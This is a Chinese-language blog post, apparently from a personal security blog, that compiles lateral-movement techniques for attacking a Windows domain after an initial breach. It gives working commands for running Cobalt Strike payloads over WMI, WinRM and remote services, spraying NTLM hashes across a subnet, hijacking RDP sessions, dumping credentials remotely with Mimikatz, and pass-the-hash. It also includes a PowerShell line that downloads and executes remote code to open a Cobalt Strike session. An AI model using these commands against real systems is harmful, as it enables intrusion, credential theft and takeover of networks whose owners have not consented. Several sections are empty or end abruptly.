

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/head.png">
  <link rel="icon" type="image/png" href="/img/head.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="SE_Null">
  <meta name="keywords" content="">
  <title>横向移动 - SE_Null</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SE_Null</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/5.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-10-13 16:24" pubdate>
        October 13, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.9k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      24
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">横向移动</h1>
            
            <div class="markdown-body" id="post-body">
              <p>在攻击者获取到某台内网机器的控制权限以及拿到其他机器的账户密码之后，进一步会考虑如何在内网进行横向移动，以及攻击域控服务器，本文总结了突破边界后进一步的攻击技巧。</p>
<a id="more"></a>


<h2 id="1-WMI"><a href="#1-WMI" class="headerlink" title="1.WMI"></a>1.WMI</h2><p>WMI全称”windows管理规范”，从win2003开始一直存在。</p>
<p><strong>利用条件</strong></p>
<p>1、WMI服务开启，端口135，默认开启。</p>
<p>2、防火墙允许135、445等端口通信。</p>
<p>3、管理员权限，以及本地管理员组..</p>
<p>关于域用户添加进本地管理组的方法，可以参考 <a target="_blank" rel="noopener" href="https://richardstk.com/2013/11/26/adding-domain-users-to-the-local-administrators-group-using-group-policy/">https://richardstk.com/2013/11/26/adding-domain-users-to-the-local-administrators-group-using-group-policy/</a></p>
<p><strong>利用方法</strong></p>
<h3 id="1-windows自带wmic工具横向移动"><a href="#1-windows自带wmic工具横向移动" class="headerlink" title="1.windows自带wmic工具横向移动"></a>1.windows自带wmic工具横向移动</h3><p>先使用cs生成powershell上线载荷</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204130530497.png" srcset="/img/loading.gif" alt="image-20210204130530497"><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204130606900.png" srcset="/img/loading.gif" alt="image-20210204130606900"></p>
<p>cmd执行：</p>
<pre><code class="hljs crmsh">wmic /<span class="hljs-keyword">NODE</span><span class="hljs-title">:目标ip</span> /user:<span class="hljs-string">&quot;域\主机名&quot;</span> /password:<span class="hljs-string">&quot;密码&quot;</span> PROCESS call create <span class="hljs-string">&quot;webshell&quot;</span>
<span class="hljs-comment">#注意wenshell的payload闭合时产生的双引号需要转义</span></code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204125808036.png" srcset="/img/loading.gif" alt="image-20210204125808036"></p>
<p>cs成功上线。</p>
<h3 id="2-wmiexec-vbs"><a href="#2-wmiexec-vbs" class="headerlink" title="2.wmiexec.vbs"></a>2.wmiexec.vbs</h3><p>域环境下或者在工作组环境下都可以正常使用，使用域账号或者本地账户均可</p>
<p>工作组</p>
<pre><code class="hljs stylus">cscript wmiexec<span class="hljs-selector-class">.vbs</span> /shell <span class="hljs-number">192.168</span><span class="hljs-selector-class">.x</span><span class="hljs-selector-class">.x</span> administrator Aatest</code></pre>

<p>域环境</p>
<pre><code class="hljs dockerfile">cscript wmiexec.vbs /<span class="hljs-keyword">shell</span><span class="bash"> 目标ip 域名\用户 密码</span></code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204131550106.png" srcset="/img/loading.gif" alt="image-20210204131550106"></p>
<p>即得到目标的cmd</p>
<h3 id="3-Invoke-TheHash-ps1"><a href="#3-Invoke-TheHash-ps1" class="headerlink" title="3.Invoke-TheHash.ps1"></a>3.Invoke-TheHash.ps1</h3><p>在目标主机上分别导入Invoke-TheHash.ps1和Invoke-WMIExec.ps1</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204131656073.png" srcset="/img/loading.gif" alt="image-20210204131656073">!</p>
<p>批量撞网段内的机器即可：</p>
<pre><code class="hljs angelscript">Invoke-TheHash -Type WMIExec -Target <span class="hljs-number">192.168</span><span class="hljs-number">.93</span><span class="hljs-number">.0</span>/<span class="hljs-number">24</span> -Domain 域控名 -Username administrator -Hash 已知hash</code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204132053457.png" srcset="/img/loading.gif" alt="image-20210204132053457"></p>
<p>成功的机器可以使用WMI连接</p>
<h3 id="4-pth工具集（kali自带）"><a href="#4-pth工具集（kali自带）" class="headerlink" title="4.pth工具集（kali自带）"></a>4.pth工具集（kali自带）</h3><p>执行以下命令可以得到目标cmd环境：</p>
<pre><code class="hljs awk">pth-winexe -U 账户名%<span class="hljs-string">&#x27;密码&#x27;</span> --system --ostype=<span class="hljs-number">1</span> <span class="hljs-regexp">//</span>目标ip cmd</code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204132324616.png" srcset="/img/loading.gif" alt="image-20210204132324616"></p>
<h2 id="2-Remote-Service-Creation"><a href="#2-Remote-Service-Creation" class="headerlink" title="2.Remote Service Creation"></a>2.Remote Service Creation</h2><p>远程服务控制，可以通过smb安排任务，在客户机1上执行操作启动客户机2的服务，也就要求了客户机1对客户机2具有操作权限</p>
<p>先用cs生成一个服务类型的木马</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204133407667.png" srcset="/img/loading.gif" alt="image-20210204133407667"></p>
<p>在客户机1上执行</p>
<pre><code class="hljs apache"><span class="hljs-attribute">sc</span> \\客户机<span class="hljs-number">2</span>-ip create ExampleService binpath=<span class="hljs-string">&quot;path\service.exe&quot;</span></code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204133613686.png" srcset="/img/loading.gif" alt="image-20210204133613686"></p>
<p>成功创建了一个服务ExampleService，需要手动开启：</p>
<pre><code class="hljs powershell"><span class="hljs-built_in">sc</span> \\客户机<span class="hljs-number">2</span><span class="hljs-literal">-ip</span> <span class="hljs-built_in">start</span> ExampleService</code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204133824089.png" srcset="/img/loading.gif" alt="image-20210204133824089"></p>
<p>此时cs会得到一个system的会话</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204133853885.png" srcset="/img/loading.gif" alt="image-20210204133853885"></p>
<h2 id="3-Remote-Desktop-Protocol"><a href="#3-Remote-Desktop-Protocol" class="headerlink" title="3.Remote Desktop Protocol"></a>3.Remote Desktop Protocol</h2><p>远程桌面协议RDP。微软将其对远程桌面协议(rdp)的实现功能称为远程桌面服务(RDS)</p>
<h3 id="RDP-hijacking"><a href="#RDP-hijacking" class="headerlink" title="RDP hijacking"></a><strong>RDP hijacking</strong></h3><p>非常古老的方法。在system权限下，tscon.exe使用目标会话编号，就能够立即获取目标用户的桌面，不会留下痕迹</p>
<p><strong>利用</strong></p>
<p>假如在客户机1上查询会话时发现有客户机2登录此机器没有退出</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204134825571.png" srcset="/img/loading.gif" alt="image-20210204134825571"></p>
<p>在客户机1执行：<code>JuicyPotato.exe -p &quot;tscon id&quot;</code></p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204134905353.png" srcset="/img/loading.gif" alt="image-20210204134905353"></p>
<p>成功就可以直接远程登录到客户机2的机器上</p>
<p>但是客户机2会被踢出登录的客户机1</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204135218438.png" srcset="/img/loading.gif" alt="image-20210204135218438"></p>
<h2 id="4-PowerShell-Remoting"><a href="#4-PowerShell-Remoting" class="headerlink" title="4.PowerShell Remoting"></a>4.PowerShell Remoting</h2><p>winRM服务，2012之后默认开启，也可以使用以下命令开启：<code>winrm quickconfig</code></p>
<p>执行以下命令连接到开启了服务的机器：</p>
<pre><code class="hljs cmake">Enter-PSSession -Computername <span class="hljs-keyword">TARGET</span></code></pre>

<p>或者远程获取机器的账号密码（利用条件：administrator或者winRM）：</p>
<p>在客户机2上导入mimikatz的ps1脚本<code>Import-Module .\mimikatz.ps1</code>，执行以下命令就可以获取客户机1的账户密码：</p>
<pre><code class="hljs angelscript">Invoke-Mimikatz -DumpCreds -ComputerName 客户机<span class="hljs-number">1</span>-NAME.域控名</code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204140032023.png" srcset="/img/loading.gif" alt="image-20210204140032023"></p>
<h2 id="5-Task-Scheduler"><a href="#5-Task-Scheduler" class="headerlink" title="5.Task Scheduler"></a>5.Task Scheduler</h2><p>计划任务，winodws内置，administrators执行 ,2008之后不能使用交互式了</p>
<pre><code class="hljs applescript"><span class="hljs-keyword">at</span> <span class="hljs-built_in">time</span> /interactive cmd 	<span class="hljs-comment">#不再可以使用这样的了</span></code></pre>

<p>且at变为schtasks</p>
<p>本地创建任务：</p>
<pre><code class="hljs jboss-cli">SCHTASKS <span class="hljs-string">/Create</span> <span class="hljs-string">/SC</span> ONCE <span class="hljs-string">/TN</span> spawn <span class="hljs-string">/TR</span> task_<span class="hljs-keyword">command</span> <span class="hljs-string">/ST</span> time
<span class="hljs-comment">#TN：任务名称</span>
<span class="hljs-comment">#TR：任务执行的程序</span>
<span class="hljs-comment">#ST：任务执行的时间</span></code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204141155993.png" srcset="/img/loading.gif" alt="image-20210204141155993"></p>
<p>本地删除任务（cmd下）：</p>
<pre><code class="hljs jboss-cli">SCHTASKS <span class="hljs-string">/Delete</span> <span class="hljs-string">/TN</span> spawn <span class="hljs-string">/F</span> &gt;nul 2&gt;&amp;1</code></pre>

<p>远程创建</p>
<pre><code class="hljs jboss-cli">SCHTASKS <span class="hljs-string">/Create</span> <span class="hljs-string">/S</span> target <span class="hljs-string">/RU</span> user_name <span class="hljs-string">/RP</span> user_password <span class="hljs-string">/TN</span> task_name <span class="hljs-string">/TR</span> task_<span class="hljs-keyword">command</span> <span class="hljs-string">/SC</span> daily <span class="hljs-string">/ST</span> time 
<span class="hljs-comment"># task_command 只能是一个文件，不能是什么命令，例如启动一个木马，可以直接计划任务执行m木马，也可以写一个bat启动，然后计划任务执行此bat</span></code></pre>

<p>powershell版本执行方法</p>
<pre><code class="hljs plain"></code></pre>

<p>若你当前拥有一台机器的administrator权限，但是得不到域内的任何东西，也即无法与DC通信，可以尝试提权到system之后，就能与DC正常通信了。</p>
<pre><code class="hljs plain"></code></pre>



<h2 id="6-PsExec"><a href="#6-PsExec" class="headerlink" title="6.PsExec"></a>6.PsExec</h2><h3 id="1-windows"><a href="#1-windows" class="headerlink" title="1.windows"></a>1.windows</h3><p>微软自家产品。通过ipc$连接，然后释放psexesvc.exe到目标机器；通过服务管理器SCManager远程创建psexecsvc服务，并启动服务；客户端连接执行命令，服务端启动相应程序并执行回显数据</p>
<p>得到指定域内机器cmd：<code>Psexec.exe \\域内主机名 cmd</code></p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204153102437.png" srcset="/img/loading.gif" alt="image-20210204153102437"></p>
<p>注:</p>
<p>1、远程机器的139 或445端口需要开启状态，即 SMB;</p>
<p>2、明文密码或者NTLM哈希;</p>
<p>3、具备将文件写入共享文件夹的权限;</p>
<p>4、能够在远程机器上创建服务:SC_MANAGER_CREATE_SERVICE(访问掩码:Ox0002);</p>
<p>5、能够启动所创建的服务:SERVICE_QUERY_STATUS (访问掩码:0x0004 )+SERVICE_START(访问掩码:Ox0010)</p>
<p>6、机器在第一次使用psexec的时候，会弹出确认提示框，为避免这个麻烦，可以加一个参数：<code>-accepteula</code></p>
<p>缺点:</p>
<p>PSEXESVC服务将会安装在远程系统中，此时将会生成Event 4697、7045这2种事件日志;有可能预生成Event 4624和Event 4652 Windows事件日志，日志会记录下该工具的使用数据。</p>
<h3 id="2-cs自带psexec"><a href="#2-cs自带psexec" class="headerlink" title="2.cs自带psexec"></a>2.cs自带psexec</h3><p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204153558664.png" srcset="/img/loading.gif" alt="image-20210204153558664"></p>
<p>再指定账户密码，选择sessions</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204153909554.png" srcset="/img/loading.gif" alt="image-20210204153909554"> </p>
<p>成功后会返回一个shell</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204154014712.png" srcset="/img/loading.gif" alt="image-20210204154014712"></p>
<h2 id="7-DCOM"><a href="#7-DCOM" class="headerlink" title="7.DCOM"></a>7.DCOM</h2><p>微软介绍：windows Distributed component object Model ( DCOM) is transparent middleware that extends the functionality of component object Model (cOM) beyond a local computer using remote procedure call (RPC) technology.  COM is a component of the windows application programming interface(API) that enables interaction between software objects.Through OOM,a client object can call methods of server objects,which are typically Dynamic Link Libraries (DLL) or executables (EXE) .</p>
<p>就是一个中间件，支持交互。</p>
<p>枚举所有DCOM对象</p>
<pre><code class="hljs powershell"><span class="hljs-built_in">Get-CimInstance</span> win32<span class="hljs-literal">-DCOMApplication</span>	<span class="hljs-built_in">PS</span>下</code></pre>

<p>部分docm能进行命令执行，通过这些dcom进行横向移动，例如</p>
<p><strong>MMC20.APPLICATION COM OBJECT</strong></p>
<p>可以使用以下命令查看DCOM的一些信息，再PS下执行</p>
<pre><code class="hljs apache"><span class="hljs-attribute">Get</span>-ChildItem &#x27;registry::HKEY_CLASSES_ROOT_WOW<span class="hljs-number">6432</span>Note\CLSID\&#123;<span class="hljs-number">49</span>B<span class="hljs-number">2791</span>A-B<span class="hljs-number">1</span>AE-<span class="hljs-number">4</span>C<span class="hljs-number">90</span>-<span class="hljs-number">9</span>B<span class="hljs-number">8</span>E-E<span class="hljs-number">8608</span>AC<span class="hljs-number">7</span>F<span class="hljs-number">889</span>&#125;&#x27;</code></pre>

<p>查询的出来的。。</p>
<p>远程利用方式如下</p>
<pre><code class="hljs elixir"><span class="hljs-variable">$a</span> =[System.Activator]::CreateInstance([type]::GetTypeFromProgID(<span class="hljs-string">&quot;MMC20.application.1&quot;</span>, <span class="hljs-string">&quot;target_ip&quot;</span>))
<span class="hljs-variable">$a</span>.Document.ActiveView.ExecuteShellCommand(<span class="hljs-string">&quot;cmd&quot;</span> ,Snull, <span class="hljs-string">&quot;/c  hostname &gt; c:\fromdcom.txt &quot;</span>, <span class="hljs-string">&quot;7&quot;</span>)</code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204161144789.png" srcset="/img/loading.gif" alt="image-20210204161144789"></p>
<p>执行成功后会在目标生成<code>c:\fromdcom.txt </code></p>
<h2 id="8-Password-Spray"><a href="#8-Password-Spray" class="headerlink" title="8.Password Spray"></a>8.Password Spray</h2><p>进行密码破解</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204161455802.png" srcset="/img/loading.gif" alt="image-20210204161455802"></p>
<h2 id="9-winrm远程管理服务"><a href="#9-winrm远程管理服务" class="headerlink" title="9.winrm远程管理服务"></a>9.winrm远程管理服务</h2><p>WinRM是Microsoft对WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的”防火墙友协议,它让来自不同供应商的硬件和操作系统能够互相操作.</p>
<p>winRM的默认端口为5985 ( http )或5986 ( https )</p>
<p>第一次使用要设置一个信任</p>
<pre><code class="hljs gams"><span class="hljs-keyword">Set</span>-Item <span class="hljs-comment">WSMan:localhost\client\trustedhosts -value *</span>
Restart-Service <span class="hljs-comment">winRM</span></code></pre>

<p>反弹一个cs会话：</p>
<pre><code class="hljs awk">Invoke-Command -ComputerName target_ip -ScriptBlock &#123; powershell.exe -nop -w hidden -c <span class="hljs-string">&quot;IEX((new-object net.webclient).downloadstring(&quot;</span>webshell_add<span class="hljs-string">r&quot;)&quot;</span>&#125; -credential administrator</code></pre>

<p>反弹shell：</p>
<pre><code class="hljs latex">Enter-PSSession -ComputerName target_ip -Credential 域名<span class="hljs-tag">\<span class="hljs-name">用</span></span>户名</code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204161911483.png" srcset="/img/loading.gif" alt="image-20210204161911483"></p>
<p><strong>Winrs</strong></p>
<p>远程管理</p>
<pre><code class="hljs groovy">winrs -<span class="hljs-attr">r:</span>target_ip -<span class="hljs-attr">u:</span>DC\username -<span class="hljs-attr">p:</span>password <span class="hljs-string">&quot;command&quot;</span></code></pre>

<p>例如得到ip信息</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204162104661.png" srcset="/img/loading.gif" alt="image-20210204162104661"></p>
<p>将命令替换为cmd即可得到目标cmd环境。</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204162509481.png" srcset="/img/loading.gif" alt="image-20210204162509481"></p>
<p><strong>cs—winrm</strong></p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204162557379.png" srcset="/img/loading.gif" alt="image-20210204162557379"></p>
<p>再选择用户名密码监听方式。</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204162735477.png" srcset="/img/loading.gif" alt="image-20210204162735477"></p>
<p>等待即可</p>
<h2 id="10-Pass-The-Hash-pth"><a href="#10-Pass-The-Hash-pth" class="headerlink" title="10.Pass-The-Hash(pth)"></a>10.Pass-The-Hash(pth)</h2><p>hash传递攻击</p>
<pre><code class="hljs dockerfile">sekurlsa::pth /<span class="hljs-keyword">user</span>:<span class="hljs-keyword">USER</span>  /ntlm:HASH /<span class="hljs-keyword">run</span><span class="bash">: cmd.exe</span></code></pre>

<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204163408004.png" srcset="/img/loading.gif" alt="image-20210204163408004"></p>
<p>执行完毕后会弹出cmd框</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204163549805.png" srcset="/img/loading.gif" alt="image-20210204163549805"></p>
<p>当然也就出现了hash传递防护：</p>
<p><strong>LocalAccountTokenFilterPolicy</strong></p>
<p>在windows Vista之后引入了一种默认开启的remote UAC，计算机的任何非SID 500本地管理员帐户，用户在远程计算机上没有特权提升能力，并且用户无法执行管理任务.</p>
<p>域内一般默认会启用winrm，我们便可以通过pth然后启动进程然后steal_token，使用winrm执行命令。在域管下执行：</p>
<p><img src="/2020/10/13/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/image-20210204164148390.png" srcset="/img/loading.gif" alt="image-20210204164148390"></p>
<p>附上依次此类型的脚本</p>
<p><a target="_blank" rel="noopener" href="https://github.com/FSecureLABS/gists/blob/master/PowerView-with-RemoteAccessPolicyEnumeration.ps1">https://github.com/FSecureLABS/gists/blob/master/PowerView-with-RemoteAccessPolicyEnumeration.ps1</a></p>
<h2 id="11-Pass-the-Ticket"><a href="#11-Pass-the-Ticket" class="headerlink" title="11.Pass-the-Ticket"></a>11.Pass-the-Ticket</h2><p>票据传递（黄金、白银）</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/">内网安全</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/wmic/">wmic</a>
                    
                      <a class="hover-with-bg" href="/tags/wmiexec-vbs/">wmiexec.vbs</a>
                    
                      <a class="hover-with-bg" href="/tags/Invoke-TheHash-ps1/">Invoke-TheHash.ps1</a>
                    
                      <a class="hover-with-bg" href="/tags/pth%E5%B7%A5%E5%85%B7%E9%9B%86/">pth工具集</a>
                    
                      <a class="hover-with-bg" href="/tags/Remote-Service-Creation/">Remote Service Creation</a>
                    
                      <a class="hover-with-bg" href="/tags/Remote-Desktop-Protocol-RDP-hijacking/">Remote Desktop Protocol-RDP hijacking</a>
                    
                      <a class="hover-with-bg" href="/tags/PowerShell-Remoting/">PowerShell Remoting</a>
                    
                      <a class="hover-with-bg" href="/tags/Task-Scheduler/">Task Scheduler</a>
                    
                      <a class="hover-with-bg" href="/tags/PsExec/">PsExec</a>
                    
                      <a class="hover-with-bg" href="/tags/DCOM/">DCOM</a>
                    
                      <a class="hover-with-bg" href="/tags/Password-Spray/">Password Spray</a>
                    
                      <a class="hover-with-bg" href="/tags/winrm%E8%BF%9C%E7%A8%8B%E7%AE%A1%E7%90%86%E6%9C%8D%E5%8A%A1/">winrm远程管理服务</a>
                    
                      <a class="hover-with-bg" href="/tags/Pass-The-Hash-pth/">Pass-The-Hash(pth)</a>
                    
                      <a class="hover-with-bg" href="/tags/LocalAccountTokenFilterPolicy/">LocalAccountTokenFilterPolicy</a>
                    
                      <a class="hover-with-bg" href="/tags/Pass-the-Ticket/">Pass-the-Ticket</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/10/14/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">奇技淫巧</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/12/%E5%9F%9F%E5%86%85%E6%94%BB%E5%87%BB/">
                        <span class="hidden-mobile">域内攻击</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <!-- <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div> -->
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "横向移动&nbsp;",
      ],
      cursorChar: "",
      typeSpeed: 100,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
